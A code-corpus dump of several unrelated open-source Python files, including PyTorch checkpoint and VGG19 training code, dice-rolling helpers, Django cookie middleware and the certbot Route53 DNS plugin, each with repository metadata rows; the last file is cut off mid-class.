def load(cls, checkpoint_dir):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_path = Checkpoint.get_checkpoint_path(checkpoint_dir)
if not checkpoint_path.exists():
# If there is no checkpoint file we try to perform a legacy load
checkpoint = Checkpoint.load_legacy(checkpoint_dir)
if checkpoint is None:
print("No checkpoint found in directory '{}'".format(checkpoint_dir))
return cls(checkpoint)
return cls(torch.load(checkpoint_path))
@staticmethod
def save(checkpoint_dir, args, model, optimizer, epoch):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_dir.mkdir(parents=True, exist_ok=True)
checkpoint = {
'model_type' : args.model_type,
'use_coords' : True if args.use_coords else False,
'epoch' : epoch,
'model_state_dict': model.state_dict(),
}
if not args.omit_optimizer_state_save:
checkpoint['optimizer_state_dict'] = optimizer.state_dict()
torch.save(checkpoint, Checkpoint.get_checkpoint_path(checkpoint_dir))
def purge(self):
self.checkpoint = None
gc.collect()
def is_valid(self):
return self.checkpoint is not None
def restore_args(self, args):
# Restore checkpoint relevant arguments
if 'model_type' in self.checkpoint:
args.model_type = self.checkpoint['model_type']
print("Restored model type '{}'".format(args.model_type))
else:
print("Failed to restore model type")
if 'use_coords' in self.checkpoint:
args.use_coords = self.checkpoint['use_coords']
print("Restored use coords flag '{}'".format(args.use_coords))
else:
print("Failed to restore use coords flag")
return args
def restore_model_state(self, model):
if 'model_state_dict' in self.checkpoint:
model.load_state_dict(self.checkpoint['model_state_dict'])
print("Restored model state")
else:
print("Failed to restore model state")
return model
def restore_epoch(self, epoch):
if 'epoch' in self.checkpoint:
epoch = self.checkpoint['epoch']
print("Restored epoch {}".format(epoch))
else:
print("Failed to restore epoch")
return epoch
def restore_optimizer_state(self, optimizer):
if 'optimizer_state_dict' in self.checkpoint:
optimizer.load_state_dict(self.checkpoint['optimizer_state_dict'])
print("Restored optimizer state")
else:
print("Failed to restore optimizer state")
return optimizer
| 31.02439
| 85
| 0.619759
|
import gc
import json
import pathlib
import torch
class Checkpoint:
def __init__(self, checkpoint=None):
self.checkpoint = checkpoint
@staticmethod
def get_checkpoint_path(checkpoint_dir):
return checkpoint_dir.joinpath("checkpoint.tar")
@staticmethod
def load_legacy(model_dir):
model_path = model_dir.joinpath("model.data")
state_path = model_dir.joinpath("state.json")
if not model_path.exists():
return None
checkpoint = {
'model_state_dict' : torch.load(model_path),
}
print("Loaded legacy model state")
if state_path.exists():
with open(state_path, 'r') as f:
state = json.load(f)
checkpoint['epoch'] = state['epoch']
print("Loaded legacy training state")
return checkpoint
@classmethod
def load(cls, checkpoint_dir):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_path = Checkpoint.get_checkpoint_path(checkpoint_dir)
if not checkpoint_path.exists():
checkpoint = Checkpoint.load_legacy(checkpoint_dir)
if checkpoint is None:
print("No checkpoint found in directory '{}'".format(checkpoint_dir))
return cls(checkpoint)
return cls(torch.load(checkpoint_path))
@staticmethod
def save(checkpoint_dir, args, model, optimizer, epoch):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_dir.mkdir(parents=True, exist_ok=True)
checkpoint = {
'model_type' : args.model_type,
'use_coords' : True if args.use_coords else False,
'epoch' : epoch,
'model_state_dict': model.state_dict(),
}
if not args.omit_optimizer_state_save:
checkpoint['optimizer_state_dict'] = optimizer.state_dict()
torch.save(checkpoint, Checkpoint.get_checkpoint_path(checkpoint_dir))
def purge(self):
self.checkpoint = None
gc.collect()
def is_valid(self):
return self.checkpoint is not None
def restore_args(self, args):
if 'model_type' in self.checkpoint:
args.model_type = self.checkpoint['model_type']
print("Restored model type '{}'".format(args.model_type))
else:
print("Failed to restore model type")
if 'use_coords' in self.checkpoint:
args.use_coords = self.checkpoint['use_coords']
print("Restored use coords flag '{}'".format(args.use_coords))
else:
print("Failed to restore use coords flag")
return args
def restore_model_state(self, model):
if 'model_state_dict' in self.checkpoint:
model.load_state_dict(self.checkpoint['model_state_dict'])
print("Restored model state")
else:
print("Failed to restore model state")
return model
def restore_epoch(self, epoch):
if 'epoch' in self.checkpoint:
epoch = self.checkpoint['epoch']
print("Restored epoch {}".format(epoch))
else:
print("Failed to restore epoch")
return epoch
def restore_optimizer_state(self, optimizer):
if 'optimizer_state_dict' in self.checkpoint:
optimizer.load_state_dict(self.checkpoint['optimizer_state_dict'])
print("Restored optimizer state")
else:
print("Failed to restore optimizer state")
return optimizer
| true
| true
|
f7193160ab5b74cc0bfaf421bd89b39fb7242385
| 1,594
|
py
|
Python
|
models/helper.py
|
kobakobashu/posenet-python
|
52290733504fd0a130cc2301bad5db761c14a4e9
|
[
"Apache-2.0"
] | null | null | null |
models/helper.py
|
kobakobashu/posenet-python
|
52290733504fd0a130cc2301bad5db761c14a4e9
|
[
"Apache-2.0"
] | 9
|
2021-05-03T01:38:46.000Z
|
2021-07-14T13:13:25.000Z
|
models/helper.py
|
kobakobashu/posenet-python
|
52290733504fd0a130cc2301bad5db761c14a4e9
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Models helper
These are helper functions for models.
"""
import torch.optim as optim
import torch.nn as nn
from configs.supported_info import SUPPORTED_OPTIMIZER, SUPPORTED_CRITERION
def get_optimizer(cfg: object, network: object) -> object:
"""Get optimizer function
This is function to get optimizer.
Args:
cfg: Config of optimizer.
network: Network of model.
Returns:
Optimizer object.
Raises:
NotImplementedError: If the optimizer you want to use is not suppoeted.
"""
optimizer_name = cfg.name
if not optimizer_name:
return None
if optimizer_name not in SUPPORTED_OPTIMIZER:
raise NotImplementedError('The optimizer is not supported.')
if optimizer_name == "adam":
return optim.Adam(network.parameters(),
lr=cfg.lr,
weight_decay=cfg.decay)
def get_criterion(cfg: object) -> object:
"""Get criterion function
This is function to get criterion.
Args:
cfg: Config of criterion.
Returns:
Criterion object.
Raises:
NotImplementedError: If the criterion you want to use is not suppoeted.
"""
criterion_name = cfg.name
if not criterion_name:
return None
if criterion_name not in SUPPORTED_CRITERION:
raise NotImplementedError('The loss function is not supported.')
if criterion_name == "cross_entropy":
return nn.CrossEntropyLoss()
elif criterion_name == "nll_loss":
return nn.NLLLoss()
| 21.835616
| 79
| 0.648055
|
import torch.optim as optim
import torch.nn as nn
from configs.supported_info import SUPPORTED_OPTIMIZER, SUPPORTED_CRITERION
def get_optimizer(cfg: object, network: object) -> object:
optimizer_name = cfg.name
if not optimizer_name:
return None
if optimizer_name not in SUPPORTED_OPTIMIZER:
raise NotImplementedError('The optimizer is not supported.')
if optimizer_name == "adam":
return optim.Adam(network.parameters(),
lr=cfg.lr,
weight_decay=cfg.decay)
def get_criterion(cfg: object) -> object:
criterion_name = cfg.name
if not criterion_name:
return None
if criterion_name not in SUPPORTED_CRITERION:
raise NotImplementedError('The loss function is not supported.')
if criterion_name == "cross_entropy":
return nn.CrossEntropyLoss()
elif criterion_name == "nll_loss":
return nn.NLLLoss()
| true
| true
|
f719316890fdeb362381d720d148647e2cd07220
| 299
|
py
|
Python
|
roll.py
|
intuited/legendlore
|
ed7942ebfe3724b09515d431f3f2031a94e60eda
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
roll.py
|
intuited/legendlore
|
ed7942ebfe3724b09515d431f3f2031a94e60eda
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
roll.py
|
intuited/legendlore
|
ed7942ebfe3724b09515d431f3f2031a94e60eda
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
from random import randint
from functools import partial
def roll3d6():
return sum(randint(1, 6) for i in range(3))
def roll4d6dl1():
dice = sorted(randint(1, 6) for i in range(4))
return sum(dice[1:])
def genchar(roll_method=roll4d6dl1):
return [roll_method() for i in range(6)]
| 23
| 50
| 0.692308
|
from random import randint
from functools import partial
def roll3d6():
return sum(randint(1, 6) for i in range(3))
def roll4d6dl1():
dice = sorted(randint(1, 6) for i in range(4))
return sum(dice[1:])
def genchar(roll_method=roll4d6dl1):
return [roll_method() for i in range(6)]
| true
| true
|
f71931a377b93d7eb6f7878b5c0f35e19f2a5c5c
| 1,092
|
py
|
Python
|
python/cinn/__init__.py
|
Avin0323/CINN
|
093217619c821e73cec15511fa54cb0026ed0476
|
[
"Apache-2.0"
] | null | null | null |
python/cinn/__init__.py
|
Avin0323/CINN
|
093217619c821e73cec15511fa54cb0026ed0476
|
[
"Apache-2.0"
] | null | null | null |
python/cinn/__init__.py
|
Avin0323/CINN
|
093217619c821e73cec15511fa54cb0026ed0476
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2021 CINN Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
cinndir = os.path.dirname(os.path.abspath(__file__))
runtime_include_dir = os.path.join(cinndir, "libs")
cuhfile = os.path.join(runtime_include_dir, "cinn_cuda_runtime_source.cuh")
if os.path.exists(cuhfile):
os.environ.setdefault('runtime_include_dir', runtime_include_dir)
from .core_api.common import *
from .core_api.backends import *
from .core_api.poly import *
from .core_api.ir import *
from .core_api.lang import *
from .version import full_version as __version__
| 37.655172
| 75
| 0.772894
|
import os
cinndir = os.path.dirname(os.path.abspath(__file__))
runtime_include_dir = os.path.join(cinndir, "libs")
cuhfile = os.path.join(runtime_include_dir, "cinn_cuda_runtime_source.cuh")
if os.path.exists(cuhfile):
os.environ.setdefault('runtime_include_dir', runtime_include_dir)
from .core_api.common import *
from .core_api.backends import *
from .core_api.poly import *
from .core_api.ir import *
from .core_api.lang import *
from .version import full_version as __version__
| true
| true
|
f7193471cea625250605c013d6247623e3656276
| 482
|
py
|
Python
|
dynamic_menu/middleware.py
|
lessss4/oil-and-rope
|
b8b52609f928e8c9174b7339cbb85cc21bae4538
|
[
"MIT"
] | null | null | null |
dynamic_menu/middleware.py
|
lessss4/oil-and-rope
|
b8b52609f928e8c9174b7339cbb85cc21bae4538
|
[
"MIT"
] | null | null | null |
dynamic_menu/middleware.py
|
lessss4/oil-and-rope
|
b8b52609f928e8c9174b7339cbb85cc21bae4538
|
[
"MIT"
] | null | null | null |
class DynamicMenuMiddleware:
"""
Adds a cookie to track user when navigating our website, so we can
know which part of the web did he/she came from.
"""
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
response = self.get_response(request)
if '_auth_user_menu_referrer' not in request.COOKIES:
response.set_cookie('_auth_user_menu_referrer', None)
return response
| 32.133333
| 70
| 0.682573
|
class DynamicMenuMiddleware:
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
response = self.get_response(request)
if '_auth_user_menu_referrer' not in request.COOKIES:
response.set_cookie('_auth_user_menu_referrer', None)
return response
| true
| true
|
f71935b8f3aa0244535d6d5bf915f0643fa098c5
| 5,892
|
py
|
Python
|
Scripts_Model/scripts_pytorch/VGG19_pytorch.py
|
zhangziyezzy/DeepLearningMugenKnock
|
e306f436fb41b5549d0adf9ad331d638e5906e29
|
[
"MIT"
] | 10
|
2021-12-17T06:07:25.000Z
|
2022-03-25T13:50:05.000Z
|
Scripts_Model/scripts_pytorch/VGG19_pytorch.py
|
karaage0703/DeepLearningMugenKnock
|
26830fe049c7da8001977ca0df12e946c0f030eb
|
[
"MIT"
] | null | null | null |
Scripts_Model/scripts_pytorch/VGG19_pytorch.py
|
karaage0703/DeepLearningMugenKnock
|
26830fe049c7da8001977ca0df12e946c0f030eb
|
[
"MIT"
] | 2
|
2022-03-15T02:42:09.000Z
|
2022-03-30T23:19:55.000Z
|
import torch
import torch.nn.functional as F
import numpy as np
from collections import OrderedDict
from easydict import EasyDict
from _main_base import main
import os
#---
# config
#---
cfg = EasyDict()
# class
cfg.CLASS_LABEL = ['akahara', 'madara']
cfg.CLASS_NUM = len(cfg.CLASS_LABEL)
# model
cfg.INPUT_HEIGHT = 64
cfg.INPUT_WIDTH = 64
cfg.INPUT_CHANNEL = 3
cfg.GPU = False
cfg.DEVICE = torch.device("cuda" if cfg.GPU and torch.cuda.is_available() else "cpu")
cfg.MODEL_SAVE_PATH = 'models/VGG16_{}.pt'
cfg.MODEL_SAVE_INTERVAL = 200
cfg.ITERATION = 1000
cfg.MINIBATCH = 8
cfg.OPTIMIZER = torch.optim.SGD
cfg.LEARNING_RATE = 0.1
cfg.MOMENTUM = 0.9
cfg.LOSS_FUNCTION = loss_fn = torch.nn.NLLLoss()
cfg.TRAIN = EasyDict()
cfg.TRAIN.DISPAY_ITERATION_INTERVAL = 50
cfg.TRAIN.DATA_PATH = '../Dataset/train/images/'
cfg.TRAIN.DATA_HORIZONTAL_FLIP = True
cfg.TRAIN.DATA_VERTICAL_FLIP = True
cfg.TRAIN.DATA_ROTATION = False
cfg.TEST = EasyDict()
cfg.TEST.MODEL_PATH = cfg.MODEL_SAVE_PATH.format('final')
cfg.TEST.DATA_PATH = '../Dataset/test/images/'
cfg.TEST.MINIBATCH = 2
# random seed
torch.manual_seed(0)
class VGG19(torch.nn.Module):
def __init__(self):
super(VGG19, self).__init__()
self.conv1 = torch.nn.Sequential(OrderedDict({
'conv1_1' : torch.nn.Conv2d(cfg.INPUT_CHANNEL, 64, kernel_size=3, padding=1, stride=1),
'conv1_1_relu' : torch.nn.ReLU(),
'conv1_1_bn' : torch.nn.BatchNorm2d(64),
'conv1_2' : torch.nn.Conv2d(64, 64, kernel_size=3, padding=1, stride=1),
'conv1_2_relu' : torch.nn.ReLU(),
'conv1_2_bn' : torch.nn.BatchNorm2d(64),
}))
self.conv2 = torch.nn.Sequential(OrderedDict({
'conv2_1' : torch.nn.Conv2d(64, 128, kernel_size=3, padding=1, stride=1),
'conv2_1_relu' : torch.nn.ReLU(),
'conv2_1_bn' : torch.nn.BatchNorm2d(128),
'conv2_2' : torch.nn.Conv2d(128, 128, kernel_size=3, padding=1, stride=1),
'conv2_2_relu' : torch.nn.ReLU(),
'conv2_2_bn' : torch.nn.BatchNorm2d(128),
}))
self.conv3 = torch.nn.Sequential(OrderedDict({
'conv3_1' : torch.nn.Conv2d(128, 256, kernel_size=3, padding=1, stride=1),
'conv3_1_relu' : torch.nn.ReLU(),
'conv3_1_bn' : torch.nn.BatchNorm2d(256),
'conv3_2' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_2_relu' : torch.nn.ReLU(),
'conv3_2_bn' : torch.nn.BatchNorm2d(256),
'conv3_3' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_3_relu' : torch.nn.ReLU(),
'conv3_3_bn' : torch.nn.BatchNorm2d(256),
'conv3_4' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_4_relu' : torch.nn.ReLU(),
'conv3_4_bn' : torch.nn.BatchNorm2d(256),
}))
self.conv4 = torch.nn.Sequential(OrderedDict({
'conv4_1' : torch.nn.Conv2d(256, 512, kernel_size=3, padding=1, stride=1),
'conv4_1_relu' : torch.nn.ReLU(),
'conv4_1_bn' : torch.nn.BatchNorm2d(512),
'conv4_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_2_relu' : torch.nn.ReLU(),
'conv4_2_bn' : torch.nn.BatchNorm2d(512),
'conv4_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_3_relu' : torch.nn.ReLU(),
'conv4_3_bn' : torch.nn.BatchNorm2d(512),
'conv4_4' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_4_relu' : torch.nn.ReLU(),
'conv4_4_bn' : torch.nn.BatchNorm2d(512),
}))
self.conv5 = torch.nn.Sequential(OrderedDict({
'conv5_1' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_1_relu' : torch.nn.ReLU(),
'conv5_1_bn' : torch.nn.BatchNorm2d(512),
'conv5_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_2_relu' : torch.nn.ReLU(),
'conv5_2_bn' : torch.nn.BatchNorm2d(512),
'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_3_relu' : torch.nn.ReLU(),
'conv5_3_bn' : torch.nn.BatchNorm2d(512),
'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_3_relu' : torch.nn.ReLU(),
'conv5_3_bn' : torch.nn.BatchNorm2d(512),
}))
self.top = torch.nn.Sequential(OrderedDict({
'Dense1' : torch.nn.Linear(512 * (cfg.INPUT_HEIGHT // 32) * (cfg.INPUT_WIDTH // 32), 256),
'Dense1_relu' : torch.nn.ReLU(),
'Dense1_dropout' : torch.nn.Dropout(p=0.5),
'Dense2' : torch.nn.Linear(256, 256),
'Dense2_relu' : torch.nn.ReLU(),
'Dense2_dropout' : torch.nn.Dropout(p=0.5),
}))
self.fc_out = torch.nn.Linear(256, cfg.CLASS_NUM)
def forward(self, x):
# block conv1
x = self.conv1(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
# block conv2
x = self.conv2(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
# block conv3
x = self.conv3(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
# block conv4
x = self.conv4(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
# block conv5
x = self.conv5(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = x.view(x.shape[0], -1)
x = self.top(x)
x = self.fc_out(x)
x = F.softmax(x, dim=1)
return x
# main
if __name__ == '__main__':
model_save_dir = '/'.join(cfg.MODEL_SAVE_PATH.split('/')[:-1])
os.makedirs(model_save_dir, exist_ok=True)
main(cfg, VGG19())
| 35.926829
| 102
| 0.593856
|
import torch
import torch.nn.functional as F
import numpy as np
from collections import OrderedDict
from easydict import EasyDict
from _main_base import main
import os
cfg = EasyDict()
cfg.CLASS_LABEL = ['akahara', 'madara']
cfg.CLASS_NUM = len(cfg.CLASS_LABEL)
cfg.INPUT_HEIGHT = 64
cfg.INPUT_WIDTH = 64
cfg.INPUT_CHANNEL = 3
cfg.GPU = False
cfg.DEVICE = torch.device("cuda" if cfg.GPU and torch.cuda.is_available() else "cpu")
cfg.MODEL_SAVE_PATH = 'models/VGG16_{}.pt'
cfg.MODEL_SAVE_INTERVAL = 200
cfg.ITERATION = 1000
cfg.MINIBATCH = 8
cfg.OPTIMIZER = torch.optim.SGD
cfg.LEARNING_RATE = 0.1
cfg.MOMENTUM = 0.9
cfg.LOSS_FUNCTION = loss_fn = torch.nn.NLLLoss()
cfg.TRAIN = EasyDict()
cfg.TRAIN.DISPAY_ITERATION_INTERVAL = 50
cfg.TRAIN.DATA_PATH = '../Dataset/train/images/'
cfg.TRAIN.DATA_HORIZONTAL_FLIP = True
cfg.TRAIN.DATA_VERTICAL_FLIP = True
cfg.TRAIN.DATA_ROTATION = False
cfg.TEST = EasyDict()
cfg.TEST.MODEL_PATH = cfg.MODEL_SAVE_PATH.format('final')
cfg.TEST.DATA_PATH = '../Dataset/test/images/'
cfg.TEST.MINIBATCH = 2
torch.manual_seed(0)
class VGG19(torch.nn.Module):
def __init__(self):
super(VGG19, self).__init__()
self.conv1 = torch.nn.Sequential(OrderedDict({
'conv1_1' : torch.nn.Conv2d(cfg.INPUT_CHANNEL, 64, kernel_size=3, padding=1, stride=1),
'conv1_1_relu' : torch.nn.ReLU(),
'conv1_1_bn' : torch.nn.BatchNorm2d(64),
'conv1_2' : torch.nn.Conv2d(64, 64, kernel_size=3, padding=1, stride=1),
'conv1_2_relu' : torch.nn.ReLU(),
'conv1_2_bn' : torch.nn.BatchNorm2d(64),
}))
self.conv2 = torch.nn.Sequential(OrderedDict({
'conv2_1' : torch.nn.Conv2d(64, 128, kernel_size=3, padding=1, stride=1),
'conv2_1_relu' : torch.nn.ReLU(),
'conv2_1_bn' : torch.nn.BatchNorm2d(128),
'conv2_2' : torch.nn.Conv2d(128, 128, kernel_size=3, padding=1, stride=1),
'conv2_2_relu' : torch.nn.ReLU(),
'conv2_2_bn' : torch.nn.BatchNorm2d(128),
}))
self.conv3 = torch.nn.Sequential(OrderedDict({
'conv3_1' : torch.nn.Conv2d(128, 256, kernel_size=3, padding=1, stride=1),
'conv3_1_relu' : torch.nn.ReLU(),
'conv3_1_bn' : torch.nn.BatchNorm2d(256),
'conv3_2' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_2_relu' : torch.nn.ReLU(),
'conv3_2_bn' : torch.nn.BatchNorm2d(256),
'conv3_3' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_3_relu' : torch.nn.ReLU(),
'conv3_3_bn' : torch.nn.BatchNorm2d(256),
'conv3_4' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_4_relu' : torch.nn.ReLU(),
'conv3_4_bn' : torch.nn.BatchNorm2d(256),
}))
self.conv4 = torch.nn.Sequential(OrderedDict({
'conv4_1' : torch.nn.Conv2d(256, 512, kernel_size=3, padding=1, stride=1),
'conv4_1_relu' : torch.nn.ReLU(),
'conv4_1_bn' : torch.nn.BatchNorm2d(512),
'conv4_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_2_relu' : torch.nn.ReLU(),
'conv4_2_bn' : torch.nn.BatchNorm2d(512),
'conv4_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_3_relu' : torch.nn.ReLU(),
'conv4_3_bn' : torch.nn.BatchNorm2d(512),
'conv4_4' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_4_relu' : torch.nn.ReLU(),
'conv4_4_bn' : torch.nn.BatchNorm2d(512),
}))
self.conv5 = torch.nn.Sequential(OrderedDict({
'conv5_1' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_1_relu' : torch.nn.ReLU(),
'conv5_1_bn' : torch.nn.BatchNorm2d(512),
'conv5_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_2_relu' : torch.nn.ReLU(),
'conv5_2_bn' : torch.nn.BatchNorm2d(512),
'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_3_relu' : torch.nn.ReLU(),
'conv5_3_bn' : torch.nn.BatchNorm2d(512),
'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_3_relu' : torch.nn.ReLU(),
'conv5_3_bn' : torch.nn.BatchNorm2d(512),
}))
self.top = torch.nn.Sequential(OrderedDict({
'Dense1' : torch.nn.Linear(512 * (cfg.INPUT_HEIGHT // 32) * (cfg.INPUT_WIDTH // 32), 256),
'Dense1_relu' : torch.nn.ReLU(),
'Dense1_dropout' : torch.nn.Dropout(p=0.5),
'Dense2' : torch.nn.Linear(256, 256),
'Dense2_relu' : torch.nn.ReLU(),
'Dense2_dropout' : torch.nn.Dropout(p=0.5),
}))
self.fc_out = torch.nn.Linear(256, cfg.CLASS_NUM)
def forward(self, x):
x = self.conv1(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = self.conv2(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = self.conv3(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = self.conv4(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = self.conv5(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = x.view(x.shape[0], -1)
x = self.top(x)
x = self.fc_out(x)
x = F.softmax(x, dim=1)
return x
if __name__ == '__main__':
model_save_dir = '/'.join(cfg.MODEL_SAVE_PATH.split('/')[:-1])
os.makedirs(model_save_dir, exist_ok=True)
main(cfg, VGG19())
| true
| true
|
f71935de250e0719a42fab6dc8ca47d5eff65661
| 5,961
|
py
|
Python
|
certbot-dns-route53/certbot_dns_route53/dns_route53.py
|
tsrivishnu/certbot
|
81f02e5578819220e0b4e15a9ceca9b77fff436e
|
[
"Apache-2.0"
] | 4
|
2020-04-09T21:57:23.000Z
|
2020-04-11T13:26:54.000Z
|
certbot-dns-route53/certbot_dns_route53/dns_route53.py
|
tsrivishnu/certbot
|
81f02e5578819220e0b4e15a9ceca9b77fff436e
|
[
"Apache-2.0"
] | 32
|
2019-02-20T14:51:48.000Z
|
2019-02-27T10:11:34.000Z
|
certbot-dns-route53/certbot_dns_route53/dns_route53.py
|
tsrivishnu/certbot
|
81f02e5578819220e0b4e15a9ceca9b77fff436e
|
[
"Apache-2.0"
] | 3
|
2019-03-21T23:21:38.000Z
|
2020-06-23T20:56:56.000Z
|
"""Certbot Route53 authenticator plugin."""
import collections
import logging
import time
import boto3
import zope.interface
from botocore.exceptions import NoCredentialsError, ClientError
from certbot import errors
from certbot import interfaces
from certbot.plugins import dns_common
from acme.magic_typing import DefaultDict, List, Dict # pylint: disable=unused-import, no-name-in-module
logger = logging.getLogger(__name__)
INSTRUCTIONS = (
"To use certbot-dns-route53, configure credentials as described at "
"https://boto3.readthedocs.io/en/latest/guide/configuration.html#best-practices-for-configuring-credentials " # pylint: disable=line-too-long
"and add the necessary permissions for Route53 access.")
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class Authenticator(dns_common.DNSAuthenticator):
"""Route53 Authenticator
This authenticator solves a DNS01 challenge by uploading the answer to AWS
Route53.
"""
description = ("Obtain certificates using a DNS TXT record (if you are using AWS Route53 for "
"DNS).")
ttl = 10
def __init__(self, *args, **kwargs):
super(Authenticator, self).__init__(*args, **kwargs)
self.r53 = boto3.client("route53")
self._resource_records = collections.defaultdict(list) # type: DefaultDict[str, List[Dict[str, str]]]
def more_info(self): # pylint: disable=missing-docstring,no-self-use
return "Solve a DNS01 challenge using AWS Route53"
def _setup_credentials(self):
pass
def _perform(self, domain, validation_domain_name, validation): # pylint: disable=missing-docstring
pass
def perform(self, achalls):
self._attempt_cleanup = True
try:
change_ids = [
self._change_txt_record("UPSERT",
achall.validation_domain_name(achall.domain),
achall.validation(achall.account_key))
for achall in achalls
]
for change_id in change_ids:
self._wait_for_change(change_id)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during perform: %s', e, exc_info=True)
raise errors.PluginError("\n".join([str(e), INSTRUCTIONS]))
return [achall.response(achall.account_key) for achall in achalls]
def _cleanup(self, domain, validation_domain_name, validation):
try:
self._change_txt_record("DELETE", validation_domain_name, validation)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during cleanup: %s', e, exc_info=True)
def _find_zone_id_for_domain(self, domain):
"""Find the zone id responsible a given FQDN.
That is, the id for the zone whose name is the longest parent of the
domain.
"""
paginator = self.r53.get_paginator("list_hosted_zones")
zones = []
target_labels = domain.rstrip(".").split(".")
for page in paginator.paginate():
for zone in page["HostedZones"]:
if zone["Config"]["PrivateZone"]:
continue
candidate_labels = zone["Name"].rstrip(".").split(".")
if candidate_labels == target_labels[-len(candidate_labels):]:
zones.append((zone["Name"], zone["Id"]))
if not zones:
raise errors.PluginError(
"Unable to find a Route53 hosted zone for {0}".format(domain)
)
# Order the zones that are suffixes for our desired to domain by
# length, this puts them in an order like:
# ["foo.bar.baz.com", "bar.baz.com", "baz.com", "com"]
# And then we choose the first one, which will be the most specific.
zones.sort(key=lambda z: len(z[0]), reverse=True)
return zones[0][1]
def _change_txt_record(self, action, validation_domain_name, validation):
zone_id = self._find_zone_id_for_domain(validation_domain_name)
rrecords = self._resource_records[validation_domain_name]
challenge = {"Value": '"{0}"'.format(validation)}
if action == "DELETE":
# Remove the record being deleted from the list of tracked records
rrecords.remove(challenge)
if rrecords:
# Need to update instead, as we're not deleting the rrset
action = "UPSERT"
else:
# Create a new list containing the record to use with DELETE
rrecords = [challenge]
else:
rrecords.append(challenge)
response = self.r53.change_resource_record_sets(
HostedZoneId=zone_id,
ChangeBatch={
"Comment": "certbot-dns-route53 certificate validation " + action,
"Changes": [
{
"Action": action,
"ResourceRecordSet": {
"Name": validation_domain_name,
"Type": "TXT",
"TTL": self.ttl,
"ResourceRecords": rrecords,
}
}
]
}
)
return response["ChangeInfo"]["Id"]
def _wait_for_change(self, change_id):
"""Wait for a change to be propagated to all Route53 DNS servers.
https://docs.aws.amazon.com/Route53/latest/APIReference/API_GetChange.html
"""
for unused_n in range(0, 120):
response = self.r53.get_change(Id=change_id)
if response["ChangeInfo"]["Status"] == "INSYNC":
return
time.sleep(5)
raise errors.PluginError(
"Timed out waiting for Route53 change. Current status: %s" %
response["ChangeInfo"]["Status"])
| 39.217105
| 146
| 0.610636
|
import collections
import logging
import time
import boto3
import zope.interface
from botocore.exceptions import NoCredentialsError, ClientError
from certbot import errors
from certbot import interfaces
from certbot.plugins import dns_common
from acme.magic_typing import DefaultDict, List, Dict
logger = logging.getLogger(__name__)
INSTRUCTIONS = (
"To use certbot-dns-route53, configure credentials as described at "
"https://boto3.readthedocs.io/en/latest/guide/configuration.html#best-practices-for-configuring-credentials "
"and add the necessary permissions for Route53 access.")
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class Authenticator(dns_common.DNSAuthenticator):
description = ("Obtain certificates using a DNS TXT record (if you are using AWS Route53 for "
"DNS).")
ttl = 10
def __init__(self, *args, **kwargs):
super(Authenticator, self).__init__(*args, **kwargs)
self.r53 = boto3.client("route53")
self._resource_records = collections.defaultdict(list)
